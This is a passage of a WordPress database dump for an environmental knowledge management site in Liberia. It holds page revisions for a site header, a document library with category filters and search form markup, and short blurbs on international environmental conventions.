11:21:02','',91,'https://ekmsliberia.info/?p=4046',0,'revision','',0),(4047,38,'2021-08-18 11:22:38','2021-08-18 11:22:38','<h2>Access environmental reports, publications, policies and other related documents</h2>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:22:38','2021-08-18 11:22:38','',91,'https://ekmsliberia.info/?p=4047',0,'revision','',0),(4048,38,'2021-08-18 11:26:02','2021-08-18 11:26:02','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:26:02','2021-08-18 11:26:02','',3800,'https://ekmsliberia.info/?p=4048',0,'revision','',0),(4049,38,'2021-08-18 11:27:50','2021-08-18 11:27:50','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:27:50','2021-08-18 11:27:50','',3800,'https://ekmsliberia.info/?p=4049',0,'revision','',0),(4050,38,'2021-08-18 11:28:27','2021-08-18 11:28:27','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:28:27','2021-08-18 11:28:27','',3800,'https://ekmsliberia.info/?p=4050',0,'revision','',0),(4051,38,'2021-08-18 11:33:01','2021-08-18 11:33:01','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />														\n		[gtranslate]','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:33:01','2021-08-18 11:33:01','',3800,'https://ekmsliberia.info/?p=4051',0,'revision','',0),(4052,38,'2021-08-18 11:36:40','2021-08-18 11:36:40','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />														\n		[gtranslate]','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:36:40','2021-08-18 11:36:40','',3800,'https://ekmsliberia.info/?p=4052',0,'revision','',0),(4053,38,'2021-08-18 11:37:15','2021-08-18 11:37:15','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />														\n		[gtranslate]','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-18 11:37:15','2021-08-18 11:37:15','',3800,'https://ekmsliberia.info/?p=4053',0,'revision','',0),(4054,38,'2021-08-18 11:40:56','2021-08-18 11:40:56','<a role=\"button\">\n						Download Document\n					</a>','Document-single-post','','publish','closed','closed','','document-single-post','','','2021-08-18 14:32:39','2021-08-18 14:32:39','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4054',0,'elementor_library','',0),(4055,42,'2021-08-18 11:42:38','2021-08-18 11:42:38','','Untitled4','','inherit','open','closed','','untitled4','','','2021-08-18 11:42:38','2021-08-18 11:42:38','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/Untitled4.png',0,'attachment','image/png',0),(4056,38,'2021-08-18 11:45:53','2021-08-18 11:45:53','','Document-single-post','','inherit','closed','closed','','4054-revision-v1','','','2021-08-18 11:45:53','2021-08-18 11:45:53','',4054,'https://ekmsliberia.info/?p=4056',0,'revision','',0),(4057,38,'2021-08-18 11:45:53','2021-08-18 11:45:53','','Document-single-post','','inherit','closed','closed','','4054-revision-v1','','','2021-08-18 11:45:53','2021-08-18 11:45:53','',4054,'https://ekmsliberia.info/?p=4057',0,'revision','',0),(4059,38,'2021-08-18 12:21:09','2021-08-18 12:21:09','<a role=\"button\">\n						Download Document\n					</a>','Document-single-post','','inherit','closed','closed','','4054-revision-v1','','','2021-08-18 12:21:09','2021-08-18 12:21:09','',4054,'https://ekmsliberia.info/?p=4059',0,'revision','',0),(4060,38,'2021-08-18 12:23:05','2021-08-18 12:23:05','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-18 12:23:05','2021-08-18 12:23:05','',3834,'https://ekmsliberia.info/?p=4060',0,'revision','',0),(4062,38,'2021-08-18 13:24:02','2021-08-18 13:24:02','','Search Filter','','publish','closed','closed','','search-filter','','','2021-08-18 13:55:40','2021-08-18 13:55:40','',0,'https://ekmsliberia.info/?post_type=jet-smart-filters&#038;p=4062',0,'jet-smart-filters','',0),(4063,38,'2021-08-18 13:26:18','2021-08-18 13:26:18','','Filter by Category','','publish','closed','closed','','select-filter','','','2021-08-18 13:57:24','2021-08-18 13:57:24','',0,'https://ekmsliberia.info/?post_type=jet-smart-filters&#038;p=4063',0,'jet-smart-filters','',0),(4064,38,'2021-08-18 13:32:19','2021-08-18 13:32:19','<h2>Access environmental reports, publications, policies and other related documents</h2>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:32:19','2021-08-18 13:32:19','',91,'https://ekmsliberia.info/?p=4064',0,'revision','',0),(4065,38,'2021-08-18 13:32:19','2021-08-18 13:32:19','<h2>Access environmental reports, publications, policies and other related documents</h2>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:32:19','2021-08-18 13:32:19','',91,'https://ekmsliberia.info/?p=4065',0,'revision','',0),(4066,38,'2021-08-18 13:32:19','2021-08-18 13:32:19','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:32:19','2021-08-18 13:32:19','',91,'https://ekmsliberia.info/?p=4066',0,'revision','',0),(4067,38,'2021-08-18 13:34:49','2021-08-18 13:34:49','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:34:49','2021-08-18 13:34:49','',91,'https://ekmsliberia.info/?p=4067',0,'revision','',0),(4068,38,'2021-08-18 13:34:49','2021-08-18 13:34:49','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:34:49','2021-08-18 13:34:49','',91,'https://ekmsliberia.info/?p=4068',0,'revision','',0),(4069,38,'2021-08-18 13:34:50','2021-08-18 13:34:50','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:34:50','2021-08-18 13:34:50','',91,'https://ekmsliberia.info/?p=4069',0,'revision','',0),(4070,38,'2021-08-18 13:39:19','2021-08-18 13:39:19','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:39:19','2021-08-18 13:39:19','',91,'https://ekmsliberia.info/?p=4070',0,'revision','',0),(4071,38,'2021-08-18 13:39:19','2021-08-18 13:39:19','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:39:19','2021-08-18 13:39:19','',91,'https://ekmsliberia.info/?p=4071',0,'revision','',0),(4072,38,'2021-08-18 13:39:20','2021-08-18 13:39:20','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search Filter\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 13:39:20','2021-08-18 13:39:20','',91,'https://ekmsliberia.info/?p=4072',0,'revision','',0),(4073,38,'2021-08-18 13:52:55','2021-08-18 13:52:55','','Search the Library','','inherit','closed','closed','','4062-autosave-v1','','','2021-08-18 13:52:55','2021-08-18 13:52:55','',4062,'https://ekmsliberia.info/?p=4073',0,'revision','',0),(4075,38,'2021-08-18 14:40:11','2021-08-18 14:40:11','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	